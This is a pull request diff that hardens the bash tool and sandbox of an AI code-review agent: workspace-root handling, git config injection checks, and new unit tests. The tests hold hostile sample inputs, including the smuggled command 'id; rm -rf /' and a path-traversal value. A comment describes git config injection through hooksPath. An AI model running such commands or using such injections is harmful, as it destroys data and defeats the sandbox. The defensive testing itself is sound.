### PR TITLE
Fix ci specific issues

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -13,6 +13,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 ### Fixed
 - Bash tool description in `createToolSet` now derives its workspace root from `toolConfig.bash.workspaceRoot ?? cwd`, matching the root the policy enforces. Previously the description always pointed at `/workspace/pr`, causing every command to be denied with `path-outside-workspace` in local environments.
 - `git-config-template` `safe.directory` is now derived from the actual `workspaceRoot` passed by the session. Previously it was hardcoded to `/workspace/pr` and `/workspace/base`, causing `git` commands to fail with a dubious ownership error in local environments.
+- `GIT_CEILING_DIRECTORIES` in `env-scrub` is now set to the parent of `workspaceRoot` rather than the hardcoded `/workspace`, so git's directory-traversal protection is effective in local checkout environments.
 
 
 ## [0.2.7] - 2026-06-18

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -14,6 +14,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 - Bash tool description in `createToolSet` now derives its workspace root from `toolConfig.bash.workspaceRoot ?? cwd`, matching the root the policy enforces. Previously the description always pointed at `/workspace/pr`, causing every command to be denied with `path-outside-workspace` in local environments.
 - `git-config-template` `safe.directory` is now derived from the actual `workspaceRoot` passed by the session. Previously it was hardcoded to `/workspace/pr` and `/workspace/base`, causing `git` commands to fail with a dubious ownership error in local environments.
 - `GIT_CEILING_DIRECTORIES` in `env-scrub` is now set to the parent of `workspaceRoot` rather than the hardcoded `/workspace`, so git's directory-traversal protection is effective in local checkout environments.
+- `workspaceRoot` is now validated against a safe path charset before being interpolated into the git config file. A newline in the value would have allowed config injection (e.g. overriding `hooksPath`).
 
 
 ## [0.2.7] - 2026-06-18

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,16 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+### Changed
+- `BASH_TOOL_DESCRIPTION` constant removed; callers use `buildBashToolDescription(root)` directly so the description always reflects the actual workspace root rather than a hardcoded `/workspace/pr`.
+
+### Fixed
+- Bash tool description in `createToolSet` now derives its workspace root from `toolConfig.bash.workspaceRoot ?? cwd`, matching the root the policy enforces. Previously the description always pointed at `/workspace/pr`, causing every command to be denied with `path-outside-workspace` in local environments.
+
+### Tests
+- Added CI-vs-local policy coverage: `workspaceRoot` variants assert that CI (`/workspace/pr`) and local (arbitrary path) roots are each enforced and don't cross-contaminate.
+- Added `QUALOPS_REVIEW_ID` validation tests: safe chars accepted, path traversal / metacharacters / absent value all fall back to a random UUID.
+
 ## [0.2.7] - 2026-06-18
 
 ### Changed

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -14,11 +14,6 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 - Bash tool description in `createToolSet` now derives its workspace root from `toolConfig.bash.workspaceRoot ?? cwd`, matching the root the policy enforces. Previously the description always pointed at `/workspace/pr`, causing every command to be denied with `path-outside-workspace` in local environments.
 - `git-config-template` `safe.directory` is now derived from the actual `workspaceRoot` passed by the session. Previously it was hardcoded to `/workspace/pr` and `/workspace/base`, causing `git` commands to fail with a dubious ownership error in local environments.
 
-### Tests
-- Added CI-vs-local policy coverage: `workspaceRoot` variants assert that CI (`/workspace/pr`) and local (arbitrary path) roots are each enforced and don't cross-contaminate.
-- Added `QUALOPS_REVIEW_ID` validation tests: safe chars accepted, path traversal / metacharacters / absent value all fall back to a random UUID.
-- Added `detectSandboxDriver` unit tests covering CI env var detection, explicit mode overrides, local driver priority order, `workspaceRoot` propagation, and the `QUALOPS_ALLOW_UNSANDBOXED` fallback.
-- Added `git-config-template` tests for CI vs local `safe.directory` content.
 
 ## [0.2.7] - 2026-06-18
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -12,10 +12,13 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Fixed
 - Bash tool description in `createToolSet` now derives its workspace root from `toolConfig.bash.workspaceRoot ?? cwd`, matching the root the policy enforces. Previously the description always pointed at `/workspace/pr`, causing every command to be denied with `path-outside-workspace` in local environments.
+- `git-config-template` `safe.directory` is now derived from the actual `workspaceRoot` passed by the session. Previously it was hardcoded to `/workspace/pr` and `/workspace/base`, causing `git` commands to fail with a dubious ownership error in local environments.
 
 ### Tests
 - Added CI-vs-local policy coverage: `workspaceRoot` variants assert that CI (`/workspace/pr`) and local (arbitrary path) roots are each enforced and don't cross-contaminate.
 - Added `QUALOPS_REVIEW_ID` validation tests: safe chars accepted, path traversal / metacharacters / absent value all fall back to a random UUID.
+- Added `detectSandboxDriver` unit tests covering CI env var detection, explicit mode overrides, local driver priority order, `workspaceRoot` propagation, and the `QUALOPS_ALLOW_UNSANDBOXED` fallback.
+- Added `git-config-template` tests for CI vs local `safe.directory` content.
 
 ## [0.2.7] - 2026-06-18
 

--- a/docs/tdr/0004-openai-compat-adapter-with-agent-loop.md
+++ b/docs/tdr/0004-openai-compat-adapter-with-agent-loop.md
@@ -1,6 +1,6 @@
 # TDR 0004 — OpenAI-Compatible Agentic Adapter
 
-**Status:** Proposed — 2026-06-09
+**Status:** Accepted — 2026-06-09
 
 ## Context
 

--- a/src/stages/review/agentic/tools/bash/description.ts
+++ b/src/stages/review/agentic/tools/bash/description.ts
@@ -1,7 +1,19 @@
-export const BASH_TOOL_DESCRIPTION = `
+/**
+ * Builds the bash tool description for the given workspace root.
+ *
+ * The model constructs commands using the path in this description verbatim
+ * (e.g. `cat <root>/src/auth.ts`), and the policy then enforces that those paths
+ * stay within `workspaceRoot`. So the description must be derived from the SAME
+ * root the policy uses — otherwise the model targets a path the policy denies
+ * with `path-outside-workspace`, which is the bug this replaces.
+ */
+export function buildBashToolDescription(workspaceRoot: string): string {
+  const root = workspaceRoot.replace(/\/+$/, '') || '/';
+
+  return `
 Execute a shell command to interrogate the codebase under review.
 
-The workspace is at /workspace/pr (the pull request code) and /workspace/base (the base branch).
+The code under review is at ${root}. File paths in the review are relative to it.
 Use this tool to run linters, grep for patterns, inspect file contents, run tests, or compute diffs.
 
 REQUIRED FIELDS:
@@ -20,16 +32,16 @@ CONSTRAINTS (hard-enforced — commands violating these are rejected before exec
 - No LD_PRELOAD or DYLD_INSERT_LIBRARIES
 
 ALLOWED examples:
-- grep -r "TODO" /workspace/pr/src --include="*.ts"
-- rg "password" /workspace/pr -l
+- grep -r "TODO" ${root}/src --include="*.ts"
+- rg "password" ${root} -l
 - git log --oneline -20
 - git diff HEAD~1 HEAD -- src/
 - tsc --noEmit
 - eslint src/ --format json
 - python3 -c "import ast; print(ast.dump(ast.parse(open('file.py').read())))"
-- cat /workspace/pr/src/auth.ts | head -100
-- find /workspace/pr -name "*.env*" -not -path "*/node_modules/*"
-- jq '.dependencies' /workspace/pr/package.json
+- cat ${root}/src/auth.ts | head -100
+- find ${root} -name "*.env*" -not -path "*/node_modules/*"
+- jq '.dependencies' ${root}/package.json
 
 OUTPUT:
 - stdout/stderr are truncated at 64 KiB / 1500 lines (tail-keep strategy)
@@ -37,3 +49,4 @@ OUTPUT:
 - Secrets matching known patterns are redacted to [REDACTED]
 - exit_code 1 from grep/rg means "no matches" (not an error); check semantic_hint
 `.trim();
+}

--- a/src/stages/review/agentic/tools/bash/env-scrub.ts
+++ b/src/stages/review/agentic/tools/bash/env-scrub.ts
@@ -165,17 +165,29 @@ export interface ScrubResult {
   dropped: string[];
 }
 
-function injectGitSafetyOverrides(env: NodeJS.ProcessEnv, gitConfigPath?: string): void {
+function injectGitSafetyOverrides(
+  env: NodeJS.ProcessEnv,
+  gitConfigPath?: string,
+  workspaceRoot?: string,
+): void {
   env['GIT_CONFIG_NOSYSTEM'] = '1';
   env['GIT_TERMINAL_PROMPT'] = '0';
   env['GIT_ASKPASS'] = 'true'; // no-op credential helper — prevents interactive prompts
-  env['GIT_CEILING_DIRECTORIES'] = '/workspace';
+  // GIT_CEILING_DIRECTORIES stops git from traversing up past the workspace root
+  // looking for a .git directory. Must be the PARENT of workspaceRoot so that git
+  // can still find the .git dir inside the checkout itself.
+  const ceiling = workspaceRoot ? workspaceRoot.replace(/\/[^/]+\/?$/, '') || '/' : '/workspace';
+  env['GIT_CEILING_DIRECTORIES'] = ceiling;
   if (gitConfigPath) {
     env['GIT_CONFIG_GLOBAL'] = gitConfigPath;
   }
 }
 
-export function scrubEnv(src: NodeJS.ProcessEnv, gitConfigPath?: string): ScrubResult {
+export function scrubEnv(
+  src: NodeJS.ProcessEnv,
+  gitConfigPath?: string,
+  workspaceRoot?: string,
+): ScrubResult {
   const result: NodeJS.ProcessEnv = {};
   const dropped: string[] = [];
 
@@ -188,7 +200,7 @@ export function scrubEnv(src: NodeJS.ProcessEnv, gitConfigPath?: string): ScrubR
     result[key] = value;
   }
 
-  injectGitSafetyOverrides(result, gitConfigPath);
+  injectGitSafetyOverrides(result, gitConfigPath, workspaceRoot);
   result['QUALOPS_ENV_SCRUBBED'] = '1';
 
   return { env: result, dropped };
@@ -225,7 +237,8 @@ export function applyEnvScrub(gitConfigPath?: string): void {
 export function makeCleanEnv(
   gitConfigPath: string,
   extra: NodeJS.ProcessEnv = {},
+  workspaceRoot?: string,
 ): NodeJS.ProcessEnv {
-  const { env } = scrubEnv(process.env, gitConfigPath);
+  const { env } = scrubEnv(process.env, gitConfigPath, workspaceRoot);
   return { ...env, ...extra };
 }

--- a/src/stages/review/agentic/tools/bash/exec.ts
+++ b/src/stages/review/agentic/tools/bash/exec.ts
@@ -22,7 +22,7 @@ export async function execBashCommand(
   opts: ExecOptions,
 ): Promise<BashOutput> {
   const timeoutMs = input.timeout_ms ?? 60000;
-  const { reviewId, callId, workspaceRoot = '/workspace', knownTokens = [] } = opts;
+  const { reviewId, callId, workspaceRoot = '/workspace/pr', knownTokens = [] } = opts;
 
   let result: SessionExecResult;
   let exitReason: BashExitReason = 'exited';

--- a/src/stages/review/agentic/tools/bash/git-config-template.ts
+++ b/src/stages/review/agentic/tools/bash/git-config-template.ts
@@ -10,14 +10,13 @@ import * as os from 'os';
 import * as path from 'path';
 
 function buildGitConfigContent(workspaceRoot: string): string {
-  // Validate before interpolating into the config file. A newline in the value
-  // would break out of the [safe] section and allow arbitrary config injection
-  // (e.g. overriding hooksPath). Only allow characters that are valid in an
-  // absolute filesystem path; throw so the caller sees a clear error rather than
-  // silently writing a malformed or compromised config file.
-  if (!/^[a-zA-Z0-9/_\-.]+$/.test(workspaceRoot)) {
+  // Guard against config injection: a newline or null byte in the value would
+  // break out of the [safe] section and allow overriding keys like hooksPath.
+  // All other characters (UTF-8, spaces, punctuation) are valid in a path and
+  // safe to interpolate into a git config value.
+  if (/[\n\r\0]/.test(workspaceRoot)) {
     throw new Error(
-      `[git-config-template] Invalid workspaceRoot — contains disallowed characters: ${JSON.stringify(workspaceRoot)}`,
+      `[git-config-template] Invalid workspaceRoot — contains newline or null byte: ${JSON.stringify(workspaceRoot)}`,
     );
   }
   const root = workspaceRoot.replace(/\/+$/, '') || '/workspace/pr';

--- a/src/stages/review/agentic/tools/bash/git-config-template.ts
+++ b/src/stages/review/agentic/tools/bash/git-config-template.ts
@@ -9,8 +9,18 @@ import * as fs from 'fs';
 import * as os from 'os';
 import * as path from 'path';
 
-const GIT_CONFIG_CONTENT = `
-[core]
+function buildGitConfigContent(workspaceRoot: string): string {
+  const root = workspaceRoot.replace(/\/+$/, '') || '/workspace';
+  // Always allow both the PR checkout and the base-branch checkout that CI
+  // places alongside it (e.g. /workspace/pr + /workspace/base). In local
+  // environments workspaceRoot is the actual checkout path and there is no
+  // separate base dir, so we only add the root itself.
+  const safeDirectories =
+    root === '/workspace/pr'
+      ? '\tdirectory = /workspace/pr\n\tdirectory = /workspace/base'
+      : `\tdirectory = ${root}`;
+
+  return `[core]
 \tfsmonitor = false
 \thooksPath = /dev/null
 \tgitProxy = none
@@ -48,39 +58,44 @@ const GIT_CONFIG_CONTENT = `
 \thelper = /bin/false
 
 [safe]
-\tdirectory = /workspace/pr
-\tdirectory = /workspace/base
+${safeDirectories}
 
 [advice]
 \tdetachedHead = false
 
 [alias]
-`.trimStart();
+`;
+}
 
 let cachedPath: string | null = null;
+let cachedRoot: string | null = null;
 
 /**
  * Writes a hardened gitconfig to a stable tmpdir path and returns that path.
  * Idempotent: returns the same path on subsequent calls within the same process.
+ * The safe.directory entry is derived from workspaceRoot so git commands work
+ * in both CI (/workspace/pr) and local checkout environments.
  */
-export function getGitConfigPath(): string {
-  if (cachedPath !== null) return cachedPath;
+export function getGitConfigPath(workspaceRoot = '/workspace/pr'): string {
+  if (cachedPath !== null && cachedRoot === workspaceRoot) return cachedPath;
 
+  const content = buildGitConfigContent(workspaceRoot);
   const dir = path.join(os.tmpdir(), `qualops-git-${process.pid}`);
   fs.mkdirSync(dir, { recursive: true, mode: 0o700 });
 
   const configPath = path.join(dir, 'gitconfig');
-  fs.writeFileSync(configPath, GIT_CONFIG_CONTENT, { encoding: 'utf8', mode: 0o600 });
+  fs.writeFileSync(configPath, content, { encoding: 'utf8', mode: 0o600 });
 
   cachedPath = configPath;
+  cachedRoot = workspaceRoot;
   return configPath;
 }
 
 /**
- * Returns the contents of the synthesised gitconfig (useful for tests).
+ * Returns the contents of the synthesised gitconfig for the given workspace root (useful for tests).
  */
-export function getGitConfigContent(): string {
-  return GIT_CONFIG_CONTENT;
+export function getGitConfigContent(workspaceRoot = '/workspace/pr'): string {
+  return buildGitConfigContent(workspaceRoot);
 }
 
 /**

--- a/src/stages/review/agentic/tools/bash/git-config-template.ts
+++ b/src/stages/review/agentic/tools/bash/git-config-template.ts
@@ -10,7 +10,7 @@ import * as os from 'os';
 import * as path from 'path';
 
 function buildGitConfigContent(workspaceRoot: string): string {
-  const root = workspaceRoot.replace(/\/+$/, '') || '/workspace';
+  const root = workspaceRoot.replace(/\/+$/, '') || '/workspace/pr';
   // Always allow both the PR checkout and the base-branch checkout that CI
   // places alongside it (e.g. /workspace/pr + /workspace/base). In local
   // environments workspaceRoot is the actual checkout path and there is no

--- a/src/stages/review/agentic/tools/bash/git-config-template.ts
+++ b/src/stages/review/agentic/tools/bash/git-config-template.ts
@@ -10,6 +10,16 @@ import * as os from 'os';
 import * as path from 'path';
 
 function buildGitConfigContent(workspaceRoot: string): string {
+  // Validate before interpolating into the config file. A newline in the value
+  // would break out of the [safe] section and allow arbitrary config injection
+  // (e.g. overriding hooksPath). Only allow characters that are valid in an
+  // absolute filesystem path; throw so the caller sees a clear error rather than
+  // silently writing a malformed or compromised config file.
+  if (!/^[a-zA-Z0-9/_\-.]+$/.test(workspaceRoot)) {
+    throw new Error(
+      `[git-config-template] Invalid workspaceRoot — contains disallowed characters: ${JSON.stringify(workspaceRoot)}`,
+    );
+  }
   const root = workspaceRoot.replace(/\/+$/, '') || '/workspace/pr';
   // Always allow both the PR checkout and the base-branch checkout that CI
   // places alongside it (e.g. /workspace/pr + /workspace/base). In local

--- a/src/stages/review/agentic/tools/bash/index.ts
+++ b/src/stages/review/agentic/tools/bash/index.ts
@@ -2,6 +2,6 @@ export { BashSession, startBashSession } from './session.js';
 export type { BashConfig } from './session.js';
 export { BashInput, BashPurpose } from './schema.js';
 export type { BashOutput } from './schema.js';
-export { BASH_TOOL_DESCRIPTION } from './description.js';
+export { buildBashToolDescription } from './description.js';
 export { applyEnvScrub } from './env-scrub.js';
 export { getGitConfigPath } from './git-config-template.js';

--- a/src/stages/review/agentic/tools/bash/modes/besteffort.linux.ts
+++ b/src/stages/review/agentic/tools/bash/modes/besteffort.linux.ts
@@ -27,7 +27,7 @@ export class BestEffortLinuxDriver implements SandboxDriver {
   readonly name = 'besteffort.linux';
   private workspaceRoot: string;
 
-  constructor(workspaceRoot: string = '/workspace') {
+  constructor(workspaceRoot: string = '/workspace/pr') {
     this.workspaceRoot = workspaceRoot;
   }
 

--- a/src/stages/review/agentic/tools/bash/modes/besteffort.macos.ts
+++ b/src/stages/review/agentic/tools/bash/modes/besteffort.macos.ts
@@ -69,7 +69,7 @@ export class BestEffortMacOSDriver implements SandboxDriver {
   private workspaceRoot: string;
   private profilePath: string | null = null;
 
-  constructor(workspaceRoot: string = '/workspace') {
+  constructor(workspaceRoot: string = '/workspace/pr') {
     this.workspaceRoot = workspaceRoot;
   }
 

--- a/src/stages/review/agentic/tools/bash/modes/detect.ts
+++ b/src/stages/review/agentic/tools/bash/modes/detect.ts
@@ -48,7 +48,7 @@ export interface DetectOptions {
  * Throws if no suitable driver can be found and unsandboxed mode is not allowed.
  */
 export function detectSandboxDriver(opts: DetectOptions = {}): SandboxDriver {
-  const { mode = 'auto', workspaceRoot = '/workspace', prHooksDir, httpProxy } = opts;
+  const { mode = 'auto', workspaceRoot = '/workspace/pr', prHooksDir, httpProxy } = opts;
 
   const explicitMode =
     mode !== 'auto' ? mode : (process.env['QUALOPS_SANDBOX_MODE'] as SandboxMode | undefined);

--- a/src/stages/review/agentic/tools/bash/session-impl.ts
+++ b/src/stages/review/agentic/tools/bash/session-impl.ts
@@ -197,7 +197,7 @@ export class BashShellSession {
     return result;
   }
 
-  async exec(command: string, workspaceRoot: string = '/workspace'): Promise<SessionExecResult> {
+  async exec(command: string, workspaceRoot: string = '/workspace/pr'): Promise<SessionExecResult> {
     if (!this.proc || this.closed) {
       throw new Error('[bash/session] Shell session has been disposed');
     }

--- a/src/stages/review/agentic/tools/bash/session-impl.ts
+++ b/src/stages/review/agentic/tools/bash/session-impl.ts
@@ -115,10 +115,11 @@ export class BashShellSession {
 
   private async spawn(): Promise<void> {
     const gitConfigPath = getGitConfigPath(this.cwd);
-    const env = makeCleanEnv(gitConfigPath, {
-      TERM: 'dumb',
-      QUALOPS_WORKSPACE: this.cwd,
-    });
+    const env = makeCleanEnv(
+      gitConfigPath,
+      { TERM: 'dumb', QUALOPS_WORKSPACE: this.cwd },
+      this.cwd,
+    );
 
     const baseOpts: SpawnOptions = {
       cwd: this.cwd,

--- a/src/stages/review/agentic/tools/bash/session-impl.ts
+++ b/src/stages/review/agentic/tools/bash/session-impl.ts
@@ -114,7 +114,7 @@ export class BashShellSession {
   }
 
   private async spawn(): Promise<void> {
-    const gitConfigPath = getGitConfigPath();
+    const gitConfigPath = getGitConfigPath(this.cwd);
     const env = makeCleanEnv(gitConfigPath, {
       TERM: 'dumb',
       QUALOPS_WORKSPACE: this.cwd,

--- a/src/stages/review/agentic/tools/bash/session.ts
+++ b/src/stages/review/agentic/tools/bash/session.ts
@@ -45,7 +45,7 @@ export class BashSession {
     // Falls back to a fresh UUID if absent or malformed.
     const reviewId =
       rawReviewId && /^[a-zA-Z0-9_-]+$/.test(rawReviewId) ? rawReviewId : crypto.randomUUID();
-    const workspaceRoot = config.workspaceRoot ?? '/workspace';
+    const workspaceRoot = config.workspaceRoot ?? '/workspace/pr';
 
     const resolvedConfig: Required<BashConfig> = {
       mode: config.mode ?? 'auto',

--- a/src/stages/review/agentic/tools/index.ts
+++ b/src/stages/review/agentic/tools/index.ts
@@ -1,6 +1,6 @@
 import { z } from 'zod';
 
-import { BashInput, BASH_TOOL_DESCRIPTION, startBashSession } from './bash';
+import { BashInput, buildBashToolDescription, startBashSession } from './bash';
 import {
   readFile,
   grepFiles,
@@ -41,7 +41,12 @@ export async function createToolSet(
     dispose = bashDispose;
     tools.push({
       name: 'bash',
-      description: BASH_TOOL_DESCRIPTION,
+      // Derive the description from the SAME root the bash policy enforces
+      // (toolConfig.bash.workspaceRoot, falling back to cwd) so the paths the
+      // model is told to use match what the policy allows. A static description
+      // pointing at /workspace would cause every command to be denied with
+      // path-outside-workspace whenever the real root is a local/CI checkout.
+      description: buildBashToolDescription(toolConfig.bash?.workspaceRoot ?? cwd),
       schema: BashInput,
       execute: async (args) => {
         const output = await session.exec(args as z.infer<typeof BashInput>);

--- a/tests/unit/stages/review/agentic/tools/bash/bash-session-review-id.spec.ts
+++ b/tests/unit/stages/review/agentic/tools/bash/bash-session-review-id.spec.ts
@@ -1,0 +1,70 @@
+// Tests for QUALOPS_REVIEW_ID validation in BashSession.start().
+// We mock BashShellSession and detectSandboxDriver so the test doesn't spawn
+// a real shell or require a sandbox driver to be available.
+
+jest.mock('@/stages/review/agentic/tools/bash/session-impl', () => ({
+  BashShellSession: {
+    create: jest.fn().mockResolvedValue({ isAlive: true, dispose: jest.fn() }),
+  },
+}));
+jest.mock('@/stages/review/agentic/tools/bash/modes/detect', () => ({
+  detectSandboxDriver: jest.fn().mockReturnValue({ name: 'none' }),
+}));
+jest.mock('@/shared/utils/logger');
+
+import { logger } from '@/shared/utils/logger';
+import { BashSession } from '@/stages/review/agentic/tools/bash/session';
+
+const mockLogger = logger as jest.Mocked<typeof logger>;
+
+// Capture the reviewId passed to logger.info('[bash/session] BashSession started', ...)
+function capturedReviewId(): string | undefined {
+  const call = mockLogger.info.mock.calls.find((c) => String(c[0]).includes('BashSession started'));
+  return (call?.[1] as { reviewId?: string } | undefined)?.reviewId;
+}
+
+describe('BashSession.start — QUALOPS_REVIEW_ID', () => {
+  const originalEnv = process.env['QUALOPS_REVIEW_ID'];
+
+  afterEach(async () => {
+    if (originalEnv === undefined) {
+      delete process.env['QUALOPS_REVIEW_ID'];
+    } else {
+      process.env['QUALOPS_REVIEW_ID'] = originalEnv;
+    }
+    jest.clearAllMocks();
+  });
+
+  it('uses QUALOPS_REVIEW_ID when it contains only safe characters', async () => {
+    process.env['QUALOPS_REVIEW_ID'] = 'pr-123_abc-XYZ';
+    const session = await BashSession.start({ mode: 'none' });
+    expect(capturedReviewId()).toBe('pr-123_abc-XYZ');
+    await session.dispose();
+  });
+
+  it('falls back to a UUID when QUALOPS_REVIEW_ID contains path traversal chars', async () => {
+    process.env['QUALOPS_REVIEW_ID'] = '../evil/path';
+    const session = await BashSession.start({ mode: 'none' });
+    const id = capturedReviewId();
+    expect(id).toMatch(/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/);
+    expect(id).not.toBe('../evil/path');
+    await session.dispose();
+  });
+
+  it('falls back to a UUID when QUALOPS_REVIEW_ID is absent', async () => {
+    delete process.env['QUALOPS_REVIEW_ID'];
+    const session = await BashSession.start({ mode: 'none' });
+    expect(capturedReviewId()).toMatch(
+      /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/,
+    );
+    await session.dispose();
+  });
+
+  it('falls back to a UUID when QUALOPS_REVIEW_ID contains shell metacharacters', async () => {
+    process.env['QUALOPS_REVIEW_ID'] = 'id; rm -rf /';
+    const session = await BashSession.start({ mode: 'none' });
+    const id = capturedReviewId();
+    expect(id).toMatch(/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/);
+    await session.dispose();
+  });
+});

--- a/tests/unit/stages/review/agentic/tools/bash/description.spec.ts
+++ b/tests/unit/stages/review/agentic/tools/bash/description.spec.ts
@@ -1,0 +1,30 @@
+import { buildBashToolDescription } from '../../../../../../../src/stages/review/agentic/tools/bash/description';
+import { evaluatePolicy } from '../../../../../../../src/stages/review/agentic/tools/bash/policy';
+
+describe('buildBashToolDescription', () => {
+  test('uses the given root, not a hardcoded /workspace', () => {
+    const root = '/home/runner/work/configurable-agent/configurable-agent';
+    const desc = buildBashToolDescription(root);
+    expect(desc).toContain(`${root}/src`);
+    expect(desc).not.toContain('/workspace');
+  });
+
+  test('trailing slashes never produce double slashes', () => {
+    const desc = buildBashToolDescription('/srv/checkout/');
+    expect(desc).toContain('/srv/checkout/src');
+    expect(desc).not.toContain('//');
+  });
+
+  // The regression guard: the bug was that the description's paths and the policy's
+  // enforced root disagreed, so every command was denied with path-outside-workspace.
+  // Assert they can't drift — the example paths in the description must pass the policy
+  // under the same root.
+  test.each(['/workspace/pr', '/home/runner/work/repo/repo'])(
+    'example paths pass the policy for root %s',
+    (root) => {
+      expect(evaluatePolicy(`cat ${root}/src/auth.ts`, { workspaceRoot: root })).toEqual({
+        deny: false,
+      });
+    },
+  );
+});

--- a/tests/unit/stages/review/agentic/tools/bash/detect.spec.ts
+++ b/tests/unit/stages/review/agentic/tools/bash/detect.spec.ts
@@ -1,0 +1,151 @@
+jest.mock('@/stages/review/agentic/tools/bash/modes/ci', () => ({
+  CISandboxDriver: jest.fn().mockImplementation(() => ({ name: 'ci' })),
+}));
+jest.mock('@/stages/review/agentic/tools/bash/modes/besteffort.linux', () => ({
+  BestEffortLinuxDriver: Object.assign(
+    jest.fn().mockImplementation(() => ({ name: 'local-besteffort-linux' })),
+    { isAvailable: jest.fn().mockReturnValue(false) },
+  ),
+}));
+jest.mock('@/stages/review/agentic/tools/bash/modes/besteffort.macos', () => ({
+  BestEffortMacOSDriver: Object.assign(
+    jest.fn().mockImplementation(() => ({ name: 'local-besteffort-macos' })),
+    { isAvailable: jest.fn().mockReturnValue(false) },
+  ),
+}));
+jest.mock('@/stages/review/agentic/tools/bash/modes/besteffort.win', () => ({
+  BestEffortWindowsDriver: Object.assign(
+    jest.fn().mockImplementation(() => ({ name: 'local-besteffort-win' })),
+    { isAvailable: jest.fn().mockReturnValue(false) },
+  ),
+}));
+jest.mock('@/stages/review/agentic/tools/bash/modes/none', () => ({
+  NoneSandboxDriver: { create: jest.fn().mockReturnValue({ name: 'none' }) },
+}));
+
+import { BestEffortLinuxDriver } from '@/stages/review/agentic/tools/bash/modes/besteffort.linux';
+import { BestEffortMacOSDriver } from '@/stages/review/agentic/tools/bash/modes/besteffort.macos';
+import { BestEffortWindowsDriver } from '@/stages/review/agentic/tools/bash/modes/besteffort.win';
+import { CISandboxDriver } from '@/stages/review/agentic/tools/bash/modes/ci';
+import { detectSandboxDriver } from '@/stages/review/agentic/tools/bash/modes/detect';
+import { NoneSandboxDriver } from '@/stages/review/agentic/tools/bash/modes/none';
+
+const CI_ENV_VARS = [
+  'CI',
+  'GITHUB_ACTIONS',
+  'GITLAB_CI',
+  'CIRCLECI',
+  'TRAVIS',
+  'JENKINS_URL',
+  'BUILDKITE',
+];
+
+function clearCIEnv() {
+  for (const v of CI_ENV_VARS) delete process.env[v];
+  delete process.env['QUALOPS_SANDBOX_MODE'];
+  delete process.env['QUALOPS_ALLOW_UNSANDBOXED'];
+}
+
+beforeEach(() => {
+  jest.clearAllMocks();
+  clearCIEnv();
+  // Default: no local driver available (forces explicit setup per test)
+  (BestEffortLinuxDriver.isAvailable as jest.Mock).mockReturnValue(false);
+  (BestEffortMacOSDriver.isAvailable as jest.Mock).mockReturnValue(false);
+  (BestEffortWindowsDriver.isAvailable as jest.Mock).mockReturnValue(false);
+});
+
+afterEach(() => {
+  clearCIEnv();
+});
+
+describe('detectSandboxDriver — explicit mode override', () => {
+  it('mode: ci returns CISandboxDriver regardless of env', () => {
+    const driver = detectSandboxDriver({ mode: 'ci' });
+    expect(driver.name).toBe('ci');
+    expect(CISandboxDriver).toHaveBeenCalledTimes(1);
+  });
+
+  it('mode: none returns NoneSandboxDriver', () => {
+    process.env['QUALOPS_ALLOW_UNSANDBOXED'] = '1';
+    const driver = detectSandboxDriver({ mode: 'none' });
+    expect(driver.name).toBe('none');
+    expect(NoneSandboxDriver.create).toHaveBeenCalledTimes(1);
+  });
+
+  it('QUALOPS_SANDBOX_MODE=ci overrides auto-detection', () => {
+    process.env['QUALOPS_SANDBOX_MODE'] = 'ci';
+    const driver = detectSandboxDriver();
+    expect(driver.name).toBe('ci');
+  });
+
+  it('QUALOPS_SANDBOX_MODE=none returns NoneSandboxDriver', () => {
+    process.env['QUALOPS_SANDBOX_MODE'] = 'none';
+    process.env['QUALOPS_ALLOW_UNSANDBOXED'] = '1';
+    const driver = detectSandboxDriver();
+    expect(driver.name).toBe('none');
+  });
+});
+
+describe('detectSandboxDriver — CI environment detection', () => {
+  it.each(CI_ENV_VARS)('%s=true routes to CISandboxDriver', (varName) => {
+    process.env[varName] = 'true';
+    const driver = detectSandboxDriver();
+    expect(driver.name).toBe('ci');
+    expect(CISandboxDriver).toHaveBeenCalledTimes(1);
+  });
+
+  it('passes prHooksDir and httpProxy to CISandboxDriver', () => {
+    process.env['CI'] = 'true';
+    detectSandboxDriver({ prHooksDir: '/workspace/pr/.git/hooks', httpProxy: 'http://proxy:3128' });
+    expect(CISandboxDriver).toHaveBeenCalledWith({
+      prHooksDir: '/workspace/pr/.git/hooks',
+      httpProxy: 'http://proxy:3128',
+    });
+  });
+});
+
+describe('detectSandboxDriver — local best-effort selection', () => {
+  it('prefers Linux driver when available', () => {
+    (BestEffortLinuxDriver.isAvailable as jest.Mock).mockReturnValue(true);
+    const driver = detectSandboxDriver();
+    expect(driver.name).toBe('local-besteffort-linux');
+    expect(BestEffortMacOSDriver.isAvailable).not.toHaveBeenCalled();
+  });
+
+  it('falls back to macOS driver when Linux is unavailable', () => {
+    (BestEffortMacOSDriver.isAvailable as jest.Mock).mockReturnValue(true);
+    const driver = detectSandboxDriver();
+    expect(driver.name).toBe('local-besteffort-macos');
+  });
+
+  it('falls back to Windows driver when Linux and macOS are unavailable', () => {
+    (BestEffortWindowsDriver.isAvailable as jest.Mock).mockReturnValue(true);
+    const driver = detectSandboxDriver();
+    expect(driver.name).toBe('local-besteffort-win');
+  });
+
+  it('passes workspaceRoot to Linux driver', () => {
+    (BestEffortLinuxDriver.isAvailable as jest.Mock).mockReturnValue(true);
+    detectSandboxDriver({ workspaceRoot: '/home/runner/work/repo' });
+    expect(BestEffortLinuxDriver).toHaveBeenCalledWith('/home/runner/work/repo');
+  });
+
+  it('passes workspaceRoot to macOS driver', () => {
+    (BestEffortMacOSDriver.isAvailable as jest.Mock).mockReturnValue(true);
+    detectSandboxDriver({ workspaceRoot: '/home/runner/work/repo' });
